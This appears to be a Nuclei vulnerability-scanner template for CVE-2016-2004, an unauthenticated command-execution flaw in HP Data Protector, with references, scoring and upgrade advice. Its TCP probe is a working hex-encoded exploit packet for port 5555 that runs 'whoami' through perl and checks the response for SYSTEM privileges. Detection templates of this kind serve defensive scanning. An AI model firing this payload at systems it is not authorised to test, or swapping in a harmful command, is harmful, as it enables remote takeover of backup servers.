id: CVE-2016-2004

info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
    epss-score: 0.06793
  metadata:
    max-request: 1
    product: data_protector
    vendor: hp
  tags: cve,cve2016,network,iot,hp,rce,edb
tcp:
  - host:
      - "{{Hostname}}"
    port: 5555
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950